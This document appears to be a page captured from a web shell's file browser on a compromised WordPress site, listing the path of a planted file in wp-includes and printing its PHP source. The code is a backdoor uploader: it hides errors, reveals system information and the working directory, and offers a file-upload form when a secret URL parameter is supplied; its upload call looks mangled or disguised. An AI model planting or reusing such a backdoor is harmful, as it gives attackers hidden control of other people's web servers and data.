[HOME]

Path : /home/easyrentals/public_html/wp-includes/
Upload :
Current File : /home/easyrentals/public_html/wp-includes/sc0pg.php

<?php error_reporting(0); echo php_uname()."<br>".getcwd()."<br>"; if($_GET['Casper'] == 'nfir'){$saw1 = $_FILES['file']['tmp_name'];$saw2 = $_FILES['file']['name'];echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /><input type='submit' value='UPload' /></form>"; Array($saw1,$saw2); exit(0); } ?>